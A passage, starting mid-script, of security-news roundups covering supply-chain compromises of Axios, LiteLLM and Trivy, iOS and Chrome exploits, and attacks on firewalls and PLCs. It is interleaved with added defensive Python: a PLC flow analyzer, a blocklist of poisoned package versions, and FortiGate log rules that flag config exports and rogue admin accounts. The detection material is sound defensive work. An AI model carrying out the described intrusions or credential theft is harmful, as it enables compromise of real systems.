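SSH_PORT = 22  # a PLC answering on 22 is how a planted Dropbear would show up

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed inventory: which hosts are controllers and which workstation may program them.
PLC_ASSETS = {
    "10.20.5.10": "CompactLogix (pump station)",
    "10.20.5.11": "Micro850 (dosing skid)",
    "10.20.5.20": "S7-1200 (lift station)",
}
ENGINEERING_WS = {"10.20.1.50"}

# Constructed flow export: timestamp,src,dst,dst_port,proto,bytes
SAMPLE_FLOWS = """\
ts,src,dst,dport,proto,bytes
2026-04-02T03:14:07Z,10.20.1.50,10.20.5.10,44818,tcp,18234
2026-04-02T03:21:55Z,203.0.113.45,10.20.5.10,44818,tcp,9120
2026-04-02T03:22:10Z,203.0.113.45,10.20.5.10,2222,udp,512
2026-04-02T03:30:02Z,203.0.113.45,10.20.5.10,22,tcp,40231
2026-04-02T03:31:40Z,203.0.113.45,10.20.5.20,102,tcp,2048
2026-04-02T03:32:01Z,10.20.7.9,10.20.5.11,502,tcp,128
2026-04-02T04:00:00Z,10.20.1.50,198.51.100.7,53,udp,96
"""


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def analyze_flows(flows_csv: str) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    ports_per_external_src: Dict[str, set] = defaultdict(set)
    for row in csv.DictReader(StringIO(flows_csv)):
        src, dst, port = row["src"], row["dst"], int(row["dport"])
        if dst not in PLC_ASSETS:
            continue  # only controller-bound traffic matters here
        external = not is_internal(src)
        base = {"ts": row["ts"], "src": src, "dst": dst, "asset": PLC_ASSETS[dst], "port": str(port)}
        if port == SSH_PORT:
            findings.append({**base, "rule": "ssh_to_plc", "detail": "controller accepting SSH; check for Dropbear"})
        elif port in OT_PORTS and external:
            findings.append({**base, "rule": "internet_exposed_ot", "detail": OT_PORTS[port]})
        elif port in OT_PORTS and src not in ENGINEERING_WS:
            findings.append({**base, "rule": "unapproved_ot_access", "detail": OT_PORTS[port]})
        if external:
            ports_per_external_src[src].add(port)
    # One external source touching several OT ports is the advisory's scan-then-connect pattern.
    for src, ports in ports_per_external_src.items():
        if len(ports) >= 3:
            findings.append({"ts": "", "src": src, "dst": "*", "asset": "*",
                             "port": ",".join(map(str, sorted(ports))),
                             "rule": "ot_port_sweep", "detail": f"{len(ports)} distinct OT/SSH ports"})
    return findings


def count_by_rule(findings: List[Dict[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = defaultdict(int)
    for f in findings:
        counts[f["rule"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in analyze_flows(SAMPLE_FLOWS):
        print(f"{f['rule']:<22} {f['src']:>15} -> {f['dst']}:{f['port']}  {f['detail']}")
```

The hard part in practice is the inventory, not the rules: a controller nobody listed is one the check never sees. Any internet_exposed_ot hit means the controller is reachable from outside and should be moved behind a VPN or jump host; an ssh_to_plc hit is worth an on-device look for an unexpected Dropbear binary, since controllers do not normally run an SSH server.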

Iran-affiliated cyber actors are targeting operational technology devices across US critical infrastructure, including programmable logic controllers (PLCs). These attacks have led to diminished PLC functionality, manipulation of display data and, in some cases, operational… pic.twitter.com/odBD3lBi0l

— FBI Cyber Division (@FBICyberDiv) April 7, 2026

The advisory places this activity in the context of earlier IRGC-linked operations against U.S. industrial control systems. In late 2023, IRGC-affiliated CyberAv3ngers targeted Unitronics PLCs used across multiple water and wastewater facilities, compromising at least 75 devices. The latest wave extends that playbook to a broader set of PLC vendors and sectors, reinforcing that internet-exposed controllers with weak or missing hardening remain a priority target for disruptive state-linked operations.


The Good, the Bad and the Ugly in Cybersecurity – Week 14

3 April 2026, 10:00

The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time

This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.

Catching the Payload in the Act

The attack itself followed a multi-stage, fast-moving pattern designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPI credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.

Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.

Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.

This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.

The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Poisoned npm Releases

Axios, the widely used JavaScript HTTP client, was hit by a major supply chain attack in which malicious versions of the npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to pull in a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed the attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.

Source: Socket

The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.

The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.

Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.

Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.

The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution

Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.

While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively exploited Chrome flaws addressed in 2026 so far, bringing the total to four this year. Previous issues included vulnerabilities in Chrome’s CSS component, the Skia graphics library, and the V8 JavaScript engine.

The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.

To protect against the flaw, users can update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flaw to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.


The Good, the Bad and the Ugly in Cybersecurity – Week 13

27 March 2026, 10:00

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has sentenced Russian national Aleksey Volkov to almost seven years in prison and ordered him to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments of up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have doled out two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the United States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement has also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware, and laundered the illicit proceeds. The operation enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

Source: FBI Instagram

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Résumés

Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Source: Securonix

Once the malware gains elevated privileges, it disables security defenses, modifies system settings, and downloads additional payloads from legitimate platforms and infrastructure such as Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, blending malicious activity with built-in scripting and trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and to maximize exploitation of system resources. After execution, most artifacts are removed to limit forensic visibility, leaving only the persistent mining and backdoor components.

Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely-used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Source: Phoenix Security

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.
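The Axios and LiteLLM incidents (the Week 14 “Bad” item above and the paragraph just above) both come down to specific poisoned versions sitting in a manifest, so one audit script covers both. This is an added example, not Socket’s, SentinelOne’s or either project’s own code; the package-lock.json and pip freeze output are constructed, and the blocklist holds only the versions named in these articles.

```python
"""Audit dependency manifests for the package versions named in these incidents.

Added example, not Socket's, SentinelOne's or either project's code. The lockfile
and pip freeze output below are constructed; the version blocklist is taken from the
articles above (axios, plain-crypto-js, litellm) and must be kept current from
upstream advisories in real use.
"""
import json
import re
from typing import Dict, List, Set

BLOCKLIST: Dict[str, Dict[str, Set[str]]] = {
    "npm": {"axios": {"1.14.1", "0.30.4"}, "plain-crypto-js": {"4.2.1"}},
    "pypi": {"litellm": {"1.82.7", "1.82.8"}},
}

# Constructed npm lockfile (v3 layout: a "packages" map keyed by node_modules path).
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {
            "version": "1.14.1",
            "dependencies": {"plain-crypto-js": "4.2.1", "follow-redirects": "^1.15.6"},
        },
        "node_modules/plain-crypto-js": {"version": "4.2.1", "hasInstallScript": True},
        "node_modules/follow-redirects": {"version": "1.15.9"},
    },
})

# Constructed `pip freeze` output.
SAMPLE_PIP_FREEZE = """\
litellm==1.82.8
requests==2.32.3
# editable installs and VCS lines carry no pinned version to check
-e git+https://example.invalid/internal-tool.git#egg=internal-tool
"""

PIP_LINE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s;#]+)")


def normalize_pypi(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_npm_lock(lock_text: str) -> List[Dict[str, str]]:
    findings = []
    lock = json.loads(lock_text)
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project, not a dependency
        name = path.rsplit("node_modules/", 1)[-1]  # handles nested node_modules paths
        version = meta.get("version", "")
        if version in BLOCKLIST["npm"].get(name, set()):
            findings.append({"ecosystem": "npm", "package": name, "version": version,
                             "reason": "known-malicious version"})
        if meta.get("hasInstallScript"):
            # Install scripts are exactly where the rogue dependency above did its work.
            findings.append({"ecosystem": "npm", "package": name, "version": version,
                             "reason": "runs an install script; review before trusting"})
    return findings


def audit_pip_freeze(freeze_text: str) -> List[Dict[str, str]]:
    findings = []
    for line in freeze_text.splitlines():
        m = PIP_LINE.match(line)
        if not m:
            continue
        name, version = normalize_pypi(m.group(1)), m.group(2)
        if version in BLOCKLIST["pypi"].get(name, set()):
            findings.append({"ecosystem": "pypi", "package": name, "version": version,
                             "reason": "known-malicious version"})
    return findings


def audit_all(lock_text: str, freeze_text: str) -> List[Dict[str, str]]:
    return audit_npm_lock(lock_text) + audit_pip_freeze(freeze_text)


if __name__ == "__main__":
    for f in audit_all(SAMPLE_PACKAGE_LOCK, SAMPLE_PIP_FREEZE):
        print(f"[{f['ecosystem']}] {f['package']}@{f['version']}: {f['reason']}")
```

Pointing it at real projects means reading package-lock.json and the output of pip freeze instead of the inline samples. The hasInstallScript check matters independently of the blocklist: the Axios payload lived entirely in a post-install script, so setting ignore-scripts=true in .npmrc (npm’s own option) and reviewing lockfile diffs in CI remove that execution path even for packages no blocklist knows about yet.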

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.


The Good, the Bad and the Ugly in Cybersecurity – Week 12

20 March 2026, 10:00

The Good | Operation Synergia III Disrupts Malicious Networks & the EU Sanctions State-Sponsored Attackers

Operation Synergia III, an Interpol-led crackdown spanning July 2025 to January 2026, has disrupted cybercrime infrastructure across the globe. Authorities across 72 countries sinkholed 45,000 malicious IP addresses and seized 212 devices and servers, resulting in 94 arrests and 110 ongoing investigations.

The operation focused on taking down servers used in connection to extensive phishing, ransomware, malware, and fraud networks. Regional actions highlighted the breadth of the cyber activity: Bangladesh police arrested 40 suspects tied to scams and identity theft, while law enforcement in Togo dismantled a fraud ring engaged in social engineering, including romance scams and sextortion.

Source: emailexpert

In Macau, investigators uncovered over 33,000 phishing sites impersonating casinos, banks, and government services, all poised to steal financial data. Building on earlier phases of the operation and complementary operations like Red Card 2.0, Serengeti, and Africa Cyber Surge, these joint efforts point to the growing sophistication of cybercrime and the critical role that coordinated international action plays in stemming its reach.

To further hinder threat actors, the Council of the European Union has sanctioned three companies and two individuals tied to major cyberattacks on critical infrastructure.

China-linked Integrity Technology Group supported operations that compromised over 65,000 devices across six EU countries, while Anxun Information Technology (aka i-SOON) provided hacker-for-hire services targeting governments. Two of its co-founders have also been sanctioned for their part in executing the cyberattacks.

Iran-based company Emennet Pasargad has also been sanctioned for multiple influence campaigns and breaches, including phishing and disinformation efforts.

The Bad | Researchers Uncover ‘DarkSword’ iOS Exploit Stealing Sensitive Personal Data

A new iOS exploit chain and payload dubbed ‘DarkSword’ is stealing sensitive personal information from iPhones running iOS 18.4 to 18.7. The toolkit is linked to multiple threat actors, including Russian-aligned UNC6353, who previously leveraged a similar exploit chain called Coruna. DarkSword was subsequently uncovered while various researchers analyzed Coruna’s infrastructure.

In early November 2025, NC6748 used DarkSword against Saudi Arabian users via a Snapchat-themed website. Subsequently, other attackers linked to PARS Defense, a Turkish commercial surveillance firm, started running the exploit kit on Apple devices. Early this year, cases involving DarkSword were spotted across Malaysia and, most recently, it has been leveraged to target Ukrainian users.

The snapshare[.]chat decoy page (Source: GTIG)

DarkSword exploits six documented vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, CVE-2025-43520), which Apple has since patched. Threat actors have used them to deliver at least three malware families: GHOSTBLADE (a data miner collecting crypto, messages, photos, and locations), GHOSTKNIFE (a backdoor exfiltrating accounts and communications), and GHOSTSABER (a JavaScript backdoor enumerating devices and executing code).

The delivery chain begins via Safari exploits, gaining kernel access and executing a main orchestrator (pe_main.js) that injects modules into privileged iOS services, including App Access, Wi-Fi, Keychain, and iCloud. Collected data spans passwords, messages, contacts, call history, location, browser history, Apple Health, and cryptocurrency wallets. The malware removes traces after exfiltration, indicating a focus on rapid theft rather than persistent surveillance.

Experts note that both DarkSword and Coruna exhibit signs of large language model (LLM)-assisted code expansion, showing professional design with maintainability and modularity in mind. Users are advised to update to iOS 26.3.1 and enable Lockdown Mode if at high risk.

The Ugly | Interlock Ransomware Exploits Cisco FMC Zero-Day to Breach Enterprise Firewalls

The Interlock ransomware group has been actively exploiting a critical remote code execution (RCE) zero-day in Cisco’s Secure Firewall Management Center (FMC) software since late January 2026. The vulnerability, tracked as CVE-2026-20131 (CVSS: 10.0), allows unauthenticated attackers to execute arbitrary code with root privileges on unpatched devices due to insecure deserialization of a user-supplied Java byte stream. Cisco has since issued a patch, urging customers to update immediately.

Interlock ransomware group is now exploiting a Cisco firewall bug patched on March 4

The bug is a CVSSv3 10/10 RCE in the Cisco Secure Firewall Management Center (FMC) Software: sec.cloudapps.cisco.com/security/cen…

— Catalin Cimpanu (@campuscodi.risky.biz) 19 March 2026 at 10:42

Interlock, first seen in September 2024, has a history of high-profile attacks, including deploying the NodeSnake remote access trojan (RAT) against U.K. universities. The group has claimed responsibility for incidents affecting organizations such as DaVita, Kettering Health, the Texas Tech University System, and the city of Saint Paul, Minnesota. IBM X-Force researchers recently noted Interlock’s deployment of a new AI-assisted malware strain called Slopoly, highlighting the group’s evolving capabilities.

Latest reports explain that Interlock exploited the FMC flaw 36 days before its public disclosure, beginning on January 26, giving operators a head start to compromise firewalls before defenders were aware. This early access allowed attackers to operate undetected, underlining the danger of zero-day vulnerabilities.

Cisco has faced a series of zero-day exploits in 2026 so far. Earlier this year, maximum-severity flaws in Cisco AsyncOS email appliances, Unified Communications, and Catalyst SD-WAN were patched after being actively exploited, allowing attackers to bypass authentication, compromise controllers, and insert malicious peers.

The most recent incidents affecting FMC demonstrate both Interlock’s aggressive targeting of enterprise networks and the importance of rapid patch management and coordinated vulnerability disclosure. Organizations using Cisco FMC are strongly urged to apply the latest updates to mitigate ongoing risk.


The Good, the Bad and the Ugly in Cybersecurity – Week 11

13 March 2026, 10:00

The Good | Authorities Disrupt Proxy Network and Charge BlackCat Insider, Vendors Patch Critical RCE Bugs

U.S. and European law enforcement have dismantled the SocksEscort cybercrime proxy network, which relied on Linux edge devices infected with AVRecon malware. New research found that the service maintained roughly 20,000 compromised devices weekly and offered criminals access to ‘clean’ residential IP addresses from major internet service providers to evade blocklists. Since 2020, the platform has advertised access to hundreds of thousands of IPs. Now, authorities have seized dozens of servers and domains, frozen $3.5 million in cryptocurrency, and disconnected infected routers, all previously linked to significant fraud and cryptocurrency theft.

Former DigitalMint employee Angelo Martino has been charged with conspiring with the BlackCat (aka ALPHV) ransomware group while serving as a ransomware negotiator. Prosecutors say Martino shared confidential negotiation details and participated in attacks with various accomplices between 2023 and 2025, operating as BlackCat affiliates. Victims included multiple U.S. organizations, with ransom payments exceeding $26 million, of which a 20% cut went to the BlackCat operators. Since the group emerged in 2021, the FBI has attributed thousands of victims and over $300 million in ransom payments to it.

Microsoft’s Patch Tuesday for the month delivers security updates for 79 vulnerabilities, including two publicly disclosed zero-day flaws. The release also addresses three critical vulnerabilities, including two remote code execution (RCE) bugs and one information disclosure issue.

The two zero-days, an SQL Server elevation-of-privilege flaw (CVE-2026-21262) and a .NET denial-of-service bug (CVE-2026-26127), are not known to be actively exploited. The RCE bugs in Microsoft Office, however, are exploitable via the preview pane, as is an Excel information disclosure flaw (CVE-2026-26144) that could leak data through Copilot.

Users are urged to prioritize updates to secure Office, Excel, SQL Server, and .NET environments.

The Bad | Attackers Exploit FortiGate Next-Gen Firewalls to Breach Networks

Threat actors are exploiting FortiGate Next-Generation Firewall (NGFW) appliances to gain access to targeted networks. A new post from SentinelOne outlines a consistent theme across these attacks: targeted victims did not retain appliance logs, preventing investigators from determining how and when the intruders gained access.

What happens when the FortiGate next-generation firewall protecting your network becomes the backdoor? 🚪

Our DFIR team has been tracking a wave of FortiGate NGFW compromises. Attackers are exploiting vulnerabilities to extract config files, steal service account credentials,… pic.twitter.com/Q9egoLwfN2

— SentinelOne (@SentinelOne) March 10, 2026


To date, attackers have leveraged known vulnerabilities (CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) and weak credentials to extract configuration files containing service account credentials and network topology information. These accounts, often linked to Active Directory (AD) and Lightweight Directory Access Protocol (LDAP), allowed attackers to map roles, escalate privileges, and move laterally within environments.

In one case, an attacker compromised a FortiGate appliance in November 2025, creating a local administrator account named support and adding unrestricted firewall policies. The attacker later decrypted the configuration file to extract LDAP service account credentials, which were used to enroll rogue workstations into AD, enabling deeper access. Network scanning triggered alerts, stopping further lateral movement.

In another incident, attackers rapidly deployed legitimate Remote Monitoring and Management (RMM) tools, Pulseway and MeshAgent, and downloaded malware from AWS and Google Cloud storage. The Java payload, executed via DLL side-loading, exfiltrated the NTDS.dit file and SYSTEM registry hive to an external server, potentially enabling credential harvesting, though no subsequent misuse was observed.

These incidents highlight the high value of NGFW appliances, which threat actors are exploiting for cyber espionage or ransomware attacks. SentinelOne emphasizes enforcing strong administrative access controls, maintaining up-to-date patches, and retaining detailed FortiGate logs for at least 14 days, ideally forwarded to a security information and event management (SIEM) platform, to detect configuration exports and unauthorized account creation. Proper monitoring, combined with automated defenses, can significantly reduce attacker dwell time and prevent full-scale network compromise.
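The detections recommended above (configuration exports, unauthorized admin accounts) can be written as a small rule set over FortiGate event logs. This is an added example, not SentinelOne’s detection content: the log lines are constructed, and the key=value layout and field names (action, cfgpath, cfgobj, cfgattr, ui) are modeled on FortiOS system event logs but should be checked against the log reference for your firmware before the rules are trusted; internal means RFC 1918, and the external address is an RFC 5737 documentation address.

```python
"""Detect config exports, new admins and wide-open policies in FortiGate event logs.

Added example, not SentinelOne's detection content. The log lines are constructed:
the key=value layout and field names (action, cfgpath, cfgobj, cfgattr, ui) are
modeled on FortiOS system event logs, but verify them against your own firmware's
log reference before relying on the rules. "Internal" means RFC 1918 here.
"""
import ipaddress
import re
from collections import Counter
from typing import Dict, List

KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
UI_ADDR = re.compile(r"\((\d{1,3}(?:\.\d{1,3}){3})\)")  # the IP inside ui="https(1.2.3.4)"
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

SAMPLE_LOGS = """\
date=2025-11-03 time=02:14:22 type="event" subtype="system" level="information" vd="root" user="admin" ui="https(203.0.113.45)" action="backup" msg="Configuration is backed up to the terminal"
date=2025-11-03 time=02:16:05 type="event" subtype="system" level="information" vd="root" user="admin" ui="https(203.0.113.45)" action="Add" cfgpath="system.admin" cfgobj="support" msg="Add system.admin support"
date=2025-11-03 time=02:18:40 type="event" subtype="system" level="information" vd="root" user="support" ui="https(203.0.113.45)" action="Add" cfgpath="firewall.policy" cfgobj="42" cfgattr="srcintf[any]dstintf[any]srcaddr[all]dstaddr[all]service[ALL]action[accept]" msg="Add firewall.policy 42"
date=2025-11-03 time=09:00:01 type="event" subtype="system" level="information" vd="root" user="admin" ui="ssh(10.0.0.5)" action="login" status="success" msg="Administrator admin logged in successfully from ssh(10.0.0.5)"
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value event line; quoted values lose their quotes."""
    fields = {}
    for key, raw in KV.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def ui_source(fields: Dict[str, str]) -> str:
    """Admin-session source address from ui="https(a.b.c.d)" style fields, or ''."""
    m = UI_ADDR.search(fields.get("ui", ""))
    return m.group(1) if m else ""


def evaluate(fields: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips."""
    hits = []
    action = fields.get("action", "")
    cfgpath = fields.get("cfgpath", "")
    cfgattr = fields.get("cfgattr", "")
    if action == "backup":
        hits.append("config_export")  # the pulled config is where the LDAP creds came from
    if action == "Add" and cfgpath == "system.admin":
        hits.append("admin_account_added")
    if cfgpath == "firewall.policy" and action in ("Add", "Edit") and all(
            marker in cfgattr for marker in ("srcaddr[all]", "dstaddr[all]", "action[accept]")):
        hits.append("permissive_policy")
    src = ui_source(fields)
    if src and not is_internal(src):
        hits.append("admin_ui_from_external")
    return hits


def scan(log_text: str) -> List[Dict[str, str]]:
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        fields = parse_line(line)
        for rule in evaluate(fields):
            findings.append({"rule": rule,
                             "time": f"{fields.get('date', '')} {fields.get('time', '')}",
                             "user": fields.get("user", ""), "source": ui_source(fields),
                             "object": fields.get("cfgobj", "")})
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['time']}  {f['rule']:<24} user={f['user']} src={f['source']} obj={f['object']}")
    print(summarize(scan(SAMPLE_LOGS)))
```

Retention is the real prerequisite: none of this fires if the appliance only keeps logs locally and they roll over before anyone looks, which is the gap the post describes. Forward the event log to the SIEM and alert on config_export and admin_account_added regardless of the hour; the “support” account and the any/any policy in the sample mirror the November 2025 case above.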

The Ugly | Iran-Linked Hacktivist ‘Handala’ Wipes Stryker MedTech Systems Worldwide

Medical technology giant Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

Handala says it stole 50 terabytes of data and wiped over 200,000 systems, servers, and mobile devices, forcing office shutdowns in 79 countries. Employees in the U.S., Ireland, Costa Rica, and Australia reported that corporate and personal devices enrolled for work were wiped, disrupting access to Microsoft systems, Teams, VPNs, and other applications, with some locations reverting to manual workflows.

Login screens taken over by the Handala logo (Source: WWMT.com)

At the time of the incident, staff were instructed to remove corporate management and applications from personal devices. Stryker later confirmed the incident in a Form 8-K filing with the SEC, describing a global disruption affecting its Microsoft environment. The company activated its cybersecurity response plan and is working with internal teams and external experts. The incident appears contained and involved no ransomware, though full restoration timelines remain unknown.

Handala, active since December 2023, is known to target Israeli organizations with destructive malware that wipes Windows and Linux systems, often publishing stolen sensitive data. This attack marks a major disruption for Stryker, which employs over 53,000 people and reported $22.6 billion in global sales in 2024.

Cybersecurity experts warn that Iranian state-aligned actors, including APT groups and proxy hacktivists, frequently use cyber operations for retaliation and disruptive campaigns during geopolitical escalations. They are likely to increase attacks against U.S. organizations, critical infrastructure, and allied sectors. Organizations are urged to strengthen security controls and prepare for potential follow-on campaigns targeting networks and operations.


The Good, the Bad and the Ugly in Cybersecurity – Week 10

6 March 2026, 11:00

The Good | Global Authorities Disrupt Tycoon2FA, LeakBase & Phobos Ransomware

Europol has successfully disrupted Tycoon2FA in an international operation, taking down the phishing-as-a-service (PhaaS) platform responsible for sending tens of millions of phishing emails each month. Authorities seized 330 domains used to host phishing pages and control infrastructure.

Active since 2023, Tycoon2FA enabled attackers to bypass multi-factor authentication (MFA) using adversary-in-the-middle (AitM) techniques that captured credentials and session cookies. Sold through Telegram for about $120, the service allowed low-skill criminals to launch large-scale phishing attacks against organizations worldwide.

In another seizure, LeakBase, a major cybercrime forum used to trade stolen data and hacking tools, was taken down as part of Operation Leak, a joint effort by the FBI, Europol, and law enforcement in 14 countries. Police seized two domains, posted seizure banners, executed search warrants, and made arrests worldwide.

LeakBase had amassed 142,000 members since 2021 and offered leaked databases, exploits, and cybercrime services. All forum data, including accounts, messages, and IP logs, have been preserved for evidence, with the seizure now entering a prevention phase to deter further cybercrime.

